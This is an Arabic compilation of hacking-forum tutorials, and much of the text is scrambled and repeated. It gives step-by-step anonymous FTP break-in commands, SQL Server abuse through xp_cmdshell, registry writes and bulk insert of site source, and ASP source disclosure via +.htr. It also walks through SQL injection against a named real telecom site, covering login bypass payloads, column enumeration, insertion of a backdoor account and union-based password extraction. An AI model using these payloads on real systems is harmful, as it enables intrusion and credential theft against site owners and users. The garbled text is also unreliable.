
| xp_servicecontrol--| على خدمة أنهاء أو لبدأ|--------------------------------------------السيرفر

+----------------------------+-----------------------------------------------------------------------------+

الـ هذه من أي من اإلستفاده طريقة بالشكل Procedure أما فهيالتالي

'exec master..xp_cmdshell 'dir

أستخدام لطريقة مثال مثله xp_cmdshell هذا والبقيهالتالي بالشكل فهو الريجستري في الكتابة عدا

'exec master..xp_regwrite 'REGISTERY KEY' VALUE

ملفات كود قراءة بأمكانك أنه إلى اإلشاره بقي يعمل asp أيضا التيصفحة كود نسخ ثم ومن جديد جدول إضافة طريق عن الموقع عليها

asp ووضعه 

التاليه بالطريقة الجدول هذا في))CREAT TABLE M_3 ) source varchar)8000

الجدول وأسم الجدول ببناء يقوم السطر عمود M_3 هذا وبداخلهالنوع من بايت 8000حجمه varchar واحد

الجدول هذا إلى السيرفر على ملف أي إضافة االن بأمكانك ذلك بعدالتالي بالشكل قرائته ثم ومن

'bulk insert M_3 from 'c:\InetPub\wwwroot\login.asp

اللي الخطأ رسائل طريق عن ذلك يمكنك نسخه تم ما ولقرائةالسابق الموضوع في عنها تكلمنا

عمل هو نسخه union أسهلها تم ما بها خطأ رسالة توليد يتم .حيث24. المطلوب الحساب الى بالدخول البرنامج سيقوم ذلك بعد

جهاز هو األيسر القسم قسمين؛ الى البرنامج نافذة وستنقسمفي المضيف، الكمبيوتر جهاز هو األيمن والقسم لديك الكمبيوتر

أو اسمائها تغيير أو الملفات ارسال أو جلب تستطيع المرحلة هذه . على ... حسابك محتويات في التحكم تستطيع أي الخ حذفها

فائقة بسهولة جهازك على أو  .االنترنت

البعيد الشبكي االتصال باستخدام الملفات  :Telnet نقل

Telnet ويسمح بعد عن الربط لخدمات معياري انترنت بروتوكول هيوكأنه جهازه جاعال مضيف كمبيوتر على جهازه بربط للمستخدم

. نظام العرضحسب ويختلف البعيد الكمبيوتر ذلك من جزء . نظام يستخدم البعيد الجهاز كان اذا المضيف Windows الكمبيوتربعضاألوامر معرفة فيجب آخر نظام يستخدم كان اذا أما مشكلة فال

" قائمة " لك يحضر والذي ؟ هو تعرفه أن يجب أمر وأهم للتحكمالالزمة  .باألوامر

برنامج -  :Windows من Telnet استخدام

يسمى Windows ترفق سهال عليه Telnet برنامجا الدخول يمكنكابدأ قائمة على تشغيل Start بالضغط اكتب Run ثم Telnet ثم

.. من للبرنامج البدء صفحة لك Remote اختر Connect وستنفتحSystem. الحوار صندوق اكتبفي Connect في لك سيظهر الذيخانة Host Name خانة في اكتب ثم المضيف الجهاز ملقن Port اسم

) من ) اختر ثم هو، كما اتركه او لديك كان اذا المنفذ أو الميناء، Term Typeالـ . اضغط ذلك بعد بالتجربة قم واال لديك كان ان

Connect . السري والرقم االسم الدخال فستحتاج الربط يتم وعندمااختر النقل من االنتهاء قائمة Disconnectوبعد وبعد Connect من

اختر .Exit ذلك،،،انتهى

طريق " عن "FTP اإلختراق

> الهكر مدرسة منتدى من >منقول> hacker dz :الكاتب<

فتيبي عبر إقتحام طريقة نتناول سوف اليومFTP

البور الضحية لدى يكون ان يجب اإلقتحام لنجاح و أوال21

الخاصب البور هو و مفتوحFTP

هي و السكان برامج تستعمل ان عليك مفتوح البور أن من لتأكد واهمها من و كثيرة

Superscanneهي و الثانية الخطوة الى ننتقل مفتوح البور ان تتأكد بعدما

على  إضغطStart ثمRun

اكتب ثمftp –n

عليها الدوسمكتوب في نافدة لك تطلع سوفFTP<

تمام شيء كل هنا لحد ؤوكياكتب بعدين و

Openعلى إضغط  ثم إدخالEnter

التالية النتيجة عب تتحصل سوفFTP<To 

بجانب  أكتبTo

إدخال على إضغط ثم للضحية اإلبي رقم

معي بالك خد اآلن و

تخطيتخطوة فقد الرد هدا على تحصلت إداConnected to www.assassin.com

220 websrv1 Microsoft FTP Service )Version 4.0(.التالية الكتابة أكتب اآلن و

ftp<quote user ftpتخطيتخطوة فقد الرد هدا على تحصلت إدا

331 Anonymous acces allowed, send identify )e-mail name( as password.

التالية الكتابة أكتب اآلن وftp<quote cwd ~root

تخطيتخطوة فقد الرد هدا على تحصلت إدا530 Please login with USER and PASS

التالية الكتابة أكتب ثمftp<quote pass ftp

تخطيتخطوة فقد الرد هدا على تحصلت إدااإلقتحام في نجحت و

230 Anonymous user logged in.الضحية جهاز في اآلن أنت مبروك

بإستعمال تقوم ان اال اآلن عليك  ماالفتيبي اوامر

الي المشكلة في تقعو ال لكي الكرام مرور عليها امر لن طبعا وعلى فكرة ال و أعرف ما دون من اإلقتحام نجاح هي و فيها وقعت

من بقاليأكثر تضحكو ان اردتم إدا و الفتيبي انا 20اوامر و دقيقة لهدا و شيء أي أعمل أن دون من عالقة الضحية و اإليدي مجمد

اإلقتحام نجاح بعد مباشرةا تطبقوها لكي الىوامر بحضير قمت

Pwdديسك الهارد يحتويه ما تعر لكي

Cd مثال مجلد إلقتحامCd black

بالك المسمى مجلد بإقتحام قمت المثال هدا فيLs

ديسك الهارد أو المجلد محتوى لك يتضح لكيGet 

جهازك بتاع المكتب الىسطح تحمل  لكيمثال

Get black.exePut

ل العكسية العمليةGet

في تضعه و جهازك بتاع المكتب سطح ملفمن تأخد ان  يعنيالضحية جهاز فيمثال

Put black.exeClos 

الضحية مع اإلتصال لقطع

الي الرسائل أنواع على تطرق سون اآلن و األوامر أهم هديو شرحها و األوام تطبيق أثناء الضحية جهاز من عليها نتحصل

ارقامها

Codes: Signification:110 Restart marker reply.

120 Service ready in nnn minutes. )nnn est un temps(125 Data connection already open; transfer starting.150 File status okay; about to open data connection.

200 Command okay.202 Command not implemented, superfluous at this site.

211 System status, or system help reply.212 Directory status.

213 File status.214 Help message.

215 NAME system type.220 Service ready for new user.

221 Service closing control connection.225 Data connection open; no transfer in progress. 

226 Closing data connection.227 Entering passive mode )h1, h2, h3, h4, p1, p2(.

230 User logged in, proceed.250 Requested file action okay, completed.

257 "PATHNAME" created.331 User name okay, need password.

332 Need account for login.350 Requested file action pendingfurther information.421 Service not available, closing control connection.

425 Can't open data connection.426 Connection closed; transfer aborded.

450 Requested file action not taken. )Fichier déjà utilisé par autre chose(

451 Requested action aborded: local error processing.452 Requested action not taken. )Pas assez de mémoire pour

exécuter l'action(500 Syntax error, command unrecognized.

501 Syntax error in parameters or arguments.502 Command not implemented.503 Bad sequence of commands.

504 Command not implemented for that parameter.530 Not logged in.

532 Need account for storing files.550 Requested action not taken. )Fichier non trouvé, pas d'accès

possible,...(551 Requested action aborded: page type unknown.

552 Requested file action aborded.

553 Requested action not taken. )Nom de fichier non attribué(

،،،انتهى

الـ " " SQLاختراق

> الحلم منتدى من >منقول> linuxray :الكاتب<

ال : االسكيو ماهي البداية في  ؟؟) SQL ( س

واغلب جداول على تحتوي بيانات قاعد عن عبارة هي ال االسكيوب منتهية صفحاتها تكون التي تسحب ASP المواقع صفحات هي

بياناتهاقاعدة المعلومات ASP وصفحات SQL من من كنز تكون ان ممكنبيانات قواعد و SQL الختراق ، الحقا اليه اشير ماسوف SQL وهذا

البورت على 1433تتنصتال ان به اخبرك ان مااريد قاعدة SQL ايضا من اكثر على تحتوي قد

يمكن الجداول من عدد على تحتوي بيانات قاعدة وكل بياناتبيانات كبرقواعد تتصور التى SQL ان البيانات من الكبير والعدد

. تحتويها

بيانات : قاعدة اخترقت اذا منه استفيد ان يمكن مالذي ؟ SQL ساقصد ال منتدى الموقع هذا كان اذا الموقع نشاط حسب على هذا

منتديات PHP منتديات جميع ASP بل على تحصل الغالبسوف فياسماء

موضوع اي وحذف تعديل وبامكانك السر وكلمات المستخدمينميزة على يحتوي الموقع كان اذا اما ، بها تحلم تكن لم وصالحيات

، االيميالت من خيالية اعداد على تحصل فسوف المراسالت قائمةاذن ثريا تصبح وسوف واالعالن للدعاية شركة بانشاء قم عندها

_LinuxRay التنسىارقام - اشخاص معلومات بيانات قواعد داخل شئ اي تجد ان توقعتصبح - - ان ممكن ، الميالد تورايخ عناوين . Administrator هواتف

جديد من نشاطك استعد لكن االن الملل اصابك قد انه اعرفطويال مازال  ... فالطريق

بيانات : قواعد على للدخول تحتاجة مالذي ؟ SQL س

لل فقط Passwd و User Name تحتاج

؟ : المرور وكلمة المستخدم اسم على احصل اين من س

على للحصول عديدة طرق كما User name and Passwd هناك منهاال نوع ASP اسلفصفحات من اخرى ثغرات sql.* وملفات هناك

يمكن كثيرثغرة مثل المرور كلمات على منها تحصل htr.+ ان

الثغرة هذه تستخدم : كيف

http://target/page.asp+.htr target : الهدف الموقع

Page : صفحة asp+.htr : الثغرة

حرف .... اي على التحتوي بيضاء صفحة بفتح احيانا تقوم الثغرة هذههو الفائدة منها اذن مالفائدة تتساءل سوف انك اعرف

الى اذهب البيضاء الصفحة هذه اوامر View Source خلف ترى لكيب الخاصة الوضع ASP البرمجة في تراها ان لك اليمكن التى

مثل : العادي

>%

Set DB= Server.CreateObject)"ADODB.Connection"(DB.Open "DRIVER=SQL

Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft )R( Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666"

%<-----------------------------------------------------------------

هو المستخدم اسم ان ترى السابق الكود LinuxRay_ فيهي السر 6666666وكلمة

-----------------------------------------------------------------

ال صفحة في خطأ هناك كان اذا احيانا انه المضحك مثل ASP الشئ: االتي

AMicrosoft VBScript runtime error '800a01a8'

Object required: 'Conn'

/filename.inc, line 5

بامتداد ينتهي ملف يتم inc.* هناك اوامر على يحتوي ملف هذاوكلمة المستخدم اسم على ويحتوي الملقم جانب من تنفيذها

المرورالملففي اسم باضافة وذلك الملف هذا بسحب قم تنتظر ماذا اذن

الموقع . عنوان

صفحة في االمر هذا مثل ترى ان ASP وممكنملف داخل البرمجة اوامر ان يعني هذا عليها الثغرة تطبيق عند

database.inc

>!--#include file = "database.inc"--<

ملفات مثل المرور كلمة على تحتوي ملفات عدة وهناك

global.asa++global.asa

beforemilion-global.asa-global.asamilion.sql

global-direct.asa

هو هذا لكن االسماء بهذه الملفات تكون ان الضرورة ليسمنمبرمجين قبل من عليه SQL المعتاد

االتي مثل الصفحة اسم تكتب ان فعله ماعليك : وكل

global.asa+.htr

في قديمة ثغرة صفحة IIS 3 هناك بعد تضيف ان هذا ASP وهييلي data$:: الرمز كما

file.asp::$dataعلى اال التعمل الثغرة فقط IIS 3 هذه بتطبيقها نفسك تتعب فال

اكثر ال . للعلم

المستخدم ... اسم على الحصول بعد ماذا النهاية من اقتربنا لقد؟؟ المرور وكلمة

ال قاعدة على الدخول !! SQL بعدها

استخدم انا البينات قاعدة على تدخل برامج عدة Visual هناكinterdev 6.0 السهل البرنامج استخدام افضل مازلت ACCESS لكني

2000

قائمة الى الذهاب البرنامح فتح هو فعله عليك ما كلFileاخترNew

اختار الجديدة الملفات قائمة ومنProject )Exiting Data(

موجودة بيانات قاعدة مشروع . اياختر الملف النشاء مربع لك سيظهر

Createانشاء اي

مربع سترى االنData Link Properties

اسم - بي االي او الموقع اسم معلومات لثالث فقط تحتاجالمرور - كلمة المستخدم

صندوق - 1 في الموقع اسم Select or enter server name ادخل

في - 2 المستخدم User Name اسم

السر - 3 Password كلمة

مربع ( مالحظة من الصح بإزالة )Blank Password قم

على البداية في الختبار Test Connection اضغط االسفل فيالعبارة هذه رأيت اذا البيانات بقاعدة Test Connection االتصال

Succeededبنجاح تم البيانات بقاعدة االتصال ان .فمعناه

القائمة من اليها الدخول تريد بيانات قاعدة اي تختار ان االن يمكنك: المسندلة

Select the data base on the serverعلى موافق OK واضغط . او

،،،انتهى

الـ " عن " SQLدرسمفصل

> اإلسالمية الحزم شبكة منتديات من >منقول> hish_hish :الكاتب<

نحن ما ومنها ديناميكيه صفحات إلستخدام المواقع غالبية أتجهتفيه  موجودين

المعلومات من كبير كم فيها بيانات قواعد , وتستخدمالديناميكيه الويب لغات بإحدى مكتوب سكربت طريق أو PHP وعن

ASPالبيانات قواعد محركات مع جمب إلى جمبا تعمل . والتي

SQL Server , MySQL,Oracleالبقيه وترك المطلوبه المعلومات أستخالص  يتم

بعضها ويستخدم تعالج ثم ومن المستخدم من معلومات تأخذ حيثتكون في

الـ بعض SQL أوامر صحة من التأكد أو البيانات أستخالص ليتملبناء المدخالت

رفضه أو المستخدم قبول أو المطلوبه الصفحةالتي الصفحات في مرور وكلمة مستخدم أسم طلب يتم دائما

ال عمل بعمل تخولكبها للقيام الصالحيه بإعطائه الموقع صاحب قام من إال به يقوم

موضوعي بحذف يقوم القائمه   كأن في تثبيته أو   (((وأن البيانات قاعدة في المستخدم أسم وجود من التأكد يتم حيث

أسم بجانب الموجوده لتلك مطابقه المعطاه المرور كلمةالمستخدم

الـ أمر في وتضمينها معلومه أخذ يتم بالتأكد SQL حيث يقوم الذيوصالحيتها وجودها من

للتأكد المستخدم بتوثيق يقوم سكربت كتابة عند الحذر يجب ولكنال أم المحميه للصفحه بالدخول له مخول أنه من

من وخلوها المستخدم من المستقبله القيم نظافة من بالتأكد وذلكالـ أمر تجعل أن شأنها من رموز  خاطئ SQL أي

به مسموح غير أمر بأي القيام أو بنائه في

يسمى ما عن اآلن  SQL injection سنتكلمموقع بوجود وأيضا التوثيق سكربت كتابة ضعففي أنه حيث

للتجربهالسعوديه اإلتصاالت شركة موقع  وهو

الموقع /http://www.stc.com.sa عنوانخدمة يختصبمقدمي رابط نجد الرئيسيه للصفحة الدخول عند

السعوديه في أنترنتhttp://www.stc.com.sa/arabic/scripts...asp?pagenum=25 وهو

مرور وكلمة مستخدم أسم منك يطلب فأنه دخوله !!!! عندالـ هو لنا يتبادر ما أول هذه الحاله في SQL injection دائما

بتجربة  نقوممستخدم ' : أسم

مرور ' : وكلمةالتالي الخطأ على  فنحصل :اقتباس

________________________________________

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed

quotation mark before the character string '' '. /arabic/Scripts/ar_csd_reply.asp, line 33 

________________________________________

التالي الخطا يظهر الحاالت بعض وفي :اقتباس

________________________________________

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed

quotation markbefore the character string ''' AND Password=''.

/admin/admin.asp, line 13________________________________________

الـ أمر من جزء على حصلنا هذا الخطأ أحد SQL وفي أسم وأيضاالجدول في األعمده

عمل أمكانية يؤكد ما للتحقق SQL Query للـ inject وهو المستخدمهالمدخله المرور وكلمة المستخدم أسم . صالحية

الـ عن لنتكلم التفصيل SQL injection إذن من بشيءالمستخدم اسم صالحية من بالتأكد يقوم سكربت لدينا كان لو

بالطريقة منها سنتحقق قأننا المستخدم من المدخله المرور وكلمةالتاليهcode:

________________________________________

SELECT * from Users WHERE User_Name='>field from web form<' AND Password='>field from web form<'

if) TRUE ({Login OK

}else {

Login FAILD}

________________________________________

يقوم فأنه المحميه للصفحة بالدخول لهم المسموح أحد قيام عندبالدخول له يسمح أن قبل نفسه بتوثيق تأكيد بكل

به الخاصه المرور وكلمة المستخدم أسم بأدخال قيامه  فعندالمستخدم admin : أسم

المرور t0ps3cr3t : كلمةالـ امر شكل التالي SQL فإن بالشكل : سيصبح

code:________________________________________

SELECT * from Users WHERE Users_Name='admin' AND Password='t0ps3cr3t'

________________________________________

جدول في سطر وجود يكون User وعند أن وهو الشرط فيه تحققالمستخدم المرور admin اسم  t0ps3cr3t وكلمة

قيمة بإرجاع سيقوم األمر مخول TRUE فأن المستخدم أن أي. بالدخول

إرجاع سيتم ذلك الدخول FALSE غير رفض وسيتم

الـ : بأوامر المعرفه من القليل ولو لديك يكون أن يجب SQL مالحظه.

>field from web form< صفحة في المستخدم أدخله ما محلها يحلصالحيته من التحقق

لكلمة ' وبالمثل مستخدم كإسم بإدخال قمنا عندما تجربتنا فيالـ أمر فأن التالي SQL المرور بالشكل : أصبح

code:________________________________________

SELECT * from Users WHERE User_Name=' ' ' AND Password=' ' '________________________________________

عالمة وبقي التنصيصاألولى عالمة بإغالق قمنا أننا ونالحظبعد تغلق  تنصيصلم

الخطأ رسالة لظهور أدى ما !! وهو

مستخدم ا�م بتجربة نقوم blah' OR '1'='1 : األنالمرور لكلمة .ومثلها

الـ أمر شكل SQL فيصبح

code:________________________________________

SELECT * from Users WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1'

________________________________________

حدا على جزء كل األمر لنحللSELECT * from Users

الجدول من السطور جميع أختر Users تعنيWHERE User_Name='blah' OR '1'='1' AND Password='blah' OR

'1'='1'الذي وهو بإختياره سنقوم الذي السطر بتحديد نقوم الجزء هذا في

الشروط فيه تتحقق'blah' OR '1'='1'

بوجود أصبحتشرط OR هنا ولكن نصيه قيمة تصبح لماألطراف من األقل على واحد طرف كان إذا صحيح الشرط يصبح

الشرطصحيح في المشتركههو األول الطرف فإن حالتنا 'blah' وفي

قيمة عن يعبر االن صددها في لسنا تفاصيل الخوضفي بدون وهوTRUE صحيحه

هو ' األخر 1'='1والطرف 'كانت إذا عن اإلجابة لـ 1يمكنك ال 1مساويه أم !!!!

هو تحليله بعد الشرط شكل سيكون TRUE OR TRUE إذاللشرطهي النهائيه النتيجه فإن TRUE وبالتالي

المرور لكلمة تحدث التفاصيل ونفس : القيمه جدا مهمه ليست TRUE مالحظه الشرط من نحصلها التيللكلمه بنا TRUE مساويه الخاصه المفاتيح لوحة على نكتبها التي

مستخدم أسم إستخدام تحاول ال مرور TRUE لذلك TRUE وكلمةالـ SQL injection إلتمام

الجدول من سطر أول بأختيار سيقوم السابق ويرجع Users الشرطمصفوفه في  محتوياته

للصفحة الدخول أستطعت قد أنك ستجد الحاالت بعض في وبالتالي المحميه

ال أخرى حاالت في ولكنالتفاصيل ..... لنكمل

الـ أمر في الشرط يكون ربما ألنه التنبه بعد SQL يجب يأتي ما وهوWHERE أشياء عدة من  يتحقق

نستخدم يمكننا , )two dashes( -- لذلك حيث السطر بقية إهمال ليتمالتاليه بالمدخالت قليل قبل أدخالناه ما عن اإلستعاضه

مستخدم --'blah' OR '1'='1 : أسمكلمة ) كتابة إهمال يمكنك الحاالت بعض في المرور كلمة وكذلك

الـ -- أمر في المستخدم اسم بعد تأتي ألنها ستهملها ألن SQL مرور

أحد لتخمين تحتاج لن أنك بحيث ومضمونه جدا مريحه طريقه توجداألعمده أسماء

أستخدام having clause وهيالتاليه بالطريقه

مستخدم 'having 1=1-- أسم

كالتاليه خطأ رسالة على سنحصل حيثMicrosoft OLE DB Provider for ODBC Drivers error '80040e14' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'cs_isp_user.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY

clause. 

/Arabic/Scripts/ar_csd_reply.asp, line 33 عمود أول أسم وأيضا الجدول أسم وبها

األعمده بقية اسماء على الحصول لنستطيع بعدهاgroup by سنستخدم

التالي بالشكل--group by cs_isp_user.UserID'

أسمه عمود على سنحصل passwd بعدهاالتالي بالشكل يليه اللي العمود اسم على للحصول فنستخدمه

--group by cs_isp_user.UserID,cs_isp_user.passwd'صفحة على نحصل أن إلى العمود مع جدول كل أسم زيادة ونكرر

خاطئ المستخدم أسم بأن ! تخبرنا

في األعمده أسماء من ممكن قدر أكبر بجمع نقوم أن األن نحتاجالجدول هذا

التالي بإدخال : نقوممستخدم --)blah' group by )username : أسم

التالي الخطأ على : فنحصل :اقتباس

________________________________________

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column

name 'username'. /arabic/Scripts/ar_csd_reply.asp, line 33

________________________________________

األسم له الجدول هذا في عمود يوجد ال بأنه يفيد ما username وهومثل الشائعه األسماء بتجربه نقوم

password ,username,id,userid,email,first_name

لـ تجربتنا عنه userid عند نبحث ما وهو أخر خطأ على نحصل  فأننا :اقتباس

________________________________________

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column

'cs_isp_user.passwd' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY

clause. /arabic/Scripts/ar_csd_reply.asp, line 33

________________________________________

وهو الجدول أسم وهي معلومتين على حصلنا cs_isp_user هناوهو األعمده أحد أسم passwd وأيضا

الجديد العمود اسم بإستخدام ولكن السابق العمل بتكرار االن نقومالتالي المستخدم أسم بإدخال --)blah' group by )passwd : فنقوم

التالي الخطأ على : فنحصل :اقتباس

________________________________________

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column

'cs_isp_user.UserID' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY

clause. /arabic/Scripts/ar_csd_reply.asp, line 33

________________________________________

وهو عمود أسم على وهو UserID حصلنا بتخمينه قمنا ما نفسه وهوuserid

أن إلى اإلشاره األحرف MS SQL Server تجدر  ليسحساسلحالةأسماء على إال نحصل وال منتهيه غير حلقه في سنكون أننا نالحظ

passwd و UserID الجداولعليها حصلنا التي وهي عمودين على إال يحوي ال الجدول إذنوبعدها للجدول جديد مستخدم بأدخال نقوم هذه الحاله في إذن

بتسجيل الخاصه الصفحه من طبيعي بشكل بالدخول نقوم الدخول

المستخدم أسم خانة في التالي بكتابة blah' INSERT INTO : سنقومcs_isp_user)UserID,passwd

( VALUES)'M_3','hi'(--مستخدم أسم له جديد مستخدم إضافة سيتم مرور M_3 حيث وكلمة

hiأنك على البيانات بهذه المحميه للصفحة الدخول تستطيع وبعدها

بالدخول له مخول

) عمل ) أمكانية استغالل من أنتهينا اإلتصاالت شركة مثالنا inject فيقرائة نستطبع لكي ممتعه طريقه عن الحديث سنكمل ولكننا لها

بأي الدخول تستطيع وبعدها مرورهم وكلمات المستخدمين اسماءنفسك إضافة دون منها

لشخصمشبوه وجود حول شكوك يضع لن الذي األمر وهواألسم له أخر عمود بإضافة ولكن بدأناه ما رقم id سنكمل وهو

) رقم ) أنه تذكر مستخدم لكل تسلسليأسمه جدول لدينا user إذن

التاليه االعمده  يحويid صحيح رقم وهو

username ) أرقام ) تحوي أن يمكن النصيه القيم نصيه قيمة وهوadmin1 مثال

passwd نصيه قيمه أيضا وهي

عمل يتم ) union نجرب لن عدديه قيمة إلى وتحويلها نصيه لقيمه) جدا ثمينه خطأ رساله سيخرج ولكنه التحويلالمستخدم اسم blah' union SELECT username FROM user : ندخل

شيء في تفيدنا ال خطأ رسالة على سنحصل  وهي الخطأ  رسالة :اقتباس

________________________________________

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal

number of expressions in their target lists. /admin/admin.asp, line 13

________________________________________

بزيادة التالي id نقوم بالشكل فتصبح واحد مرهblah' union SELECT username,username FROM user

الخطأ نفسرسالة على فنحصلمختلفه خطأ رسالة على نحصل أن إلى الزياده  نتابع

اسم أدخال عند الجديده الخطأ رسالة على حصلنا أننا لنفترضالتالي المستخدم

blah' union SELECT username,username,username,username,username FROM user

التاليه الخطأ رسالة على فنحصل :اقتباس

________________________________________

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error

converting thevarchar value 'Lame_Admin' to a column of data type int.

/admin/admin.asp, line 13________________________________________

  لألدمن يكون ما عادة وهو مستخدم أسم أول على حصلنامحرك من نطلب ألننا هو الخطأ هذا ظهور يقوم SQL وسبب أن

نصيه قيمة عدديه )Lame_Admin وهي( بتحويل قيمة إلى)int (صحيحه

يستطيع , ال أنه بأخبارك يقوم لذلك مسموح الغير الشيء وهوصحيحه Lame_Admin تحويل عدديه قيمة أذكىشي   إلى هذا

 بعمله microsoft قامتكلمة على الحصول وسنحاول المستخدم أسم على حصلنا االن

المرورالتالي المستخدم أسم blah' union SELECT: ندخل

passwd,passwd,passwd,passwd,passwd FROM user

المستخدم أسم على حصولنا عند السابق العدد بنفسالخطأ هذا على سنحصل :اقتباس

________________________________________

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error

converting thevarchar value 'stupid' to a column of data type int.

/admin/admin.asp, line 13________________________________________

الدخول تسجيل ويمكننا المرور وكلمة المستخدم أسم على حصلنالنا أثر أي وجود بدون المحميه للصفحة

بعض بطباعة تقوم لها الدخول عند المحميه الصفحه كانت إذا إالبإسم بالدخول شخضقام ألخر االيبي رقم مثل المعلومات

هذا المستخدمبنفسك به ستقوم بما فكر عندها

الـ عن أتكلم  Stored Procedure بقيمسبقا موجوده أدوات إلى أقرب كتشبيه بعمل Built-in وهي تقوم

طلبها عند محدد

الـ من اإلستفاده الـ Stored Procedure ستستطيع كان SQL إذاServer المستخدم على sa يعمل

الـ عليه يعمل الذي المستخدم كان إذا له SQL Server أو السماح تمبا�ستخدامها

على حصولك عند محظوظ فأنت األمكانيات SQL Server لذلك  بهذه

من أكثر 100يوجد Stored Procedure أهمها التالي الجدول في

+---------------------------+------------------------------------------------------------------------------+

| xp_cmdshell----------| ( على تنفيذه يتم التشغيل لنظام أمر تمرير) المستخدم صالحيات |-------حسب

| xp_regread-----------| في مفتاح قيمة قراءة|--------------------------------------------الريجستري

| xp_regdeletekey----| من مفتاح حذف|-------------------------------------------------الريجستري

| xp_regdeletevalue-| من مفتاح قيمة حذف|--------------------------------------------الريجستري

| xp_regwrite ----------| في للكتابة|-------------------------------------------------------الريجستري

| xp_servicecontrol--| على خدمة أنهاء أو لبدأ|--------------------------------------------السيرفر

+----------------------------+-----------------------------------------------------------------------------+

الـ هذه من أي من اإلستفاده طريقة بالشكل Procedure أما فهيالتالي

'exec master..xp_cmdshell 'dir

أستخدام لطريقة مثال مثله xp_cmdshell هذا والبقيهالتالي بالشكل فهو الريجستري في الكتابة عدا

'exec master..xp_regwrite 'REGISTERY KEY' VALUE

ملفات كود قراءة بأمكانك أنه إلى اإلشاره بقي يعمل asp أيضا التيصفحة كود نسخ ثم ومن جديد جدول إضافة طريق عن الموقع عليها

asp ووضعه 

التاليه بالطريقة الجدول هذا في))CREAT TABLE M_3 ) source varchar)8000

الجدول وأسم الجدول ببناء يقوم السطر عمود M_3 هذا وبداخلهالنوع من بايت 8000حجمه varchar واحد

الجدول هذا إلى السيرفر على ملف أي إضافة االن بأمكانك ذلك بعدالتالي بالشكل قرائته ثم ومن

'bulk insert M_3 from 'c:\InetPub\wwwroot\login.asp

اللي الخطأ رسائل طريق عن ذلك يمكنك نسخه تم ما ولقرائةالسابق الموضوع في عنها تكلمنا

عمل هو نسخه union أسهلها تم ما بها خطأ رسالة توليد يتم .حيثالمواقع ".25 اختراق في الهاك " درسإلحتراف

> اإلسالمية الحزم شبكة منتديات من >منقول> CONIK :الكاتب<

البداية في ولكن يتم وكيف المواقع أختراق تعلم في الله شاء أناالختراق عن أشياء نعلم أن  يجب

اختراق علم في مطلوبة أساسيات نعرف أخر بمعنى أو البداية فيقلنا نحن وطبعا  المواقع

الباب هو بى األى أنه االجهزة اختراق عن كان الى الدرساألول فيله المفتاح هو  والبورت

وهو يختلف المفتاح ولكن باب لنا يوجد المواقع أختراق بسفيالدنيا في اختراق ومافي  الثغرات

أمنى ضعف نقول ولكن ثغرة نقول المفروضما المهم ثغرة بدون:-

؟؟:- 1س لها تعريف يعنى الثغرات أيشهي لى تقول ممكن طيب

معين:- نظام دخول فى يساعدك أمنى هىضعف الثغرات جـالمساعدة الطريقة أيضا تكون وقد  وأختراقه

من تتحول تخليك مستخدم administrator الى user التى من يعنىويجب وتتضمن المتصرف المدير  الى

ال علشان وأستثمارها الجديدة االمنيه الثغرات معرفة الدوام علىبيها المواقع أصحاب  يتنبه

تقفليها ) ( يتم يرقعوها

أكتشففي الذى األمني الضعف الثغرات لهذه مثال وأقربليونكس نظام على يركب سيرفر وهو  االباتشى

ومن ثغرة تعتبر الموقع بناء قاعده أو البرامج أحد ضعففى وأىواألستفاده استخدامها الممكن

الموقع في والتحكم أختراقه المراد الموقع أختراق في منهاطريقها عن تريد ما وكل الباسوردات  ومشاهدة

؟؟؟:- 2س لقيتها انا اذا الثغره استثمر انا كيف طيب

نسبة:- كانت الثغرات أكتشفوا ما وقت من الثغرات% 99جـ من بالغه مكتوبه سكربتاتها أو C تكون اللغه هذه لمعرفة تحتاج وانته

تحويلها . عليك

الى يحتاج الثغرات من العديد هناك أن من shell كما تتمكن انته حتىالضعف أخر بمعنى أو الثغره هذه من  األستفاده

فى الموجوده الثغرات بعض المثال سبيل الى PHP وعلى تحتاجShell PHP الكالم هذه .ومن

الخاصة االصدارات في يكون الضعف فكرة  وعلى

نوع من ثغره في نظام Kernel 2.2.x وكمان في المرة هذه ولكنليونكس  تشغيل

باللغة ( تكون التى الثغرات هذه توجوده C مالحظه سيكربتات تكونالموقع باللغه ) فى مكتوبة أخرى سيكربتات أيضا perl وهناك

وأنا االوامر لوينكسعلشان مركب انته تكون الحالة هذه فى والزمتركب linux Redhat 7.3 أنصحك

سألته انا لمن هانتر بالك األخ انه وأذكر الماندريك من أفضل ألنهمبسطه صورة الماندريك انه لى قال هات الريد وال الماندريك أركب

الله وجزاة أقوى الريدهات وأنه للتطور قابله بسغير هات للريدللموضوع نرجع النصيحة هذه على  خير

؟؟:- 3س البيرل لغه أحول كيف

هذه:- سوى انته البداية في عادية اوامر كلها سهله مره الطريقة جـ األمر

./file.pl

الرسالة هذه  تعطيك

Access Denied---- الموافقه عدم توضح الرسالة هذه

هذه االمر بته كتا سوى عليك كا كذا لك صار  أذا

chmod +x Conik.pl----- الملف أسم تكتب انته كونيك مكان  الحظ

كذا زى تكون راح النتجيه وشوف ثانية مره  وشغلة$ ./Conik.pl

للغة:- 4س بالنسبة طيب C

تنفيذى:- ملف يكون الملف تخلى انته الملفالزم تحويل علشان جـاالمر بهذه

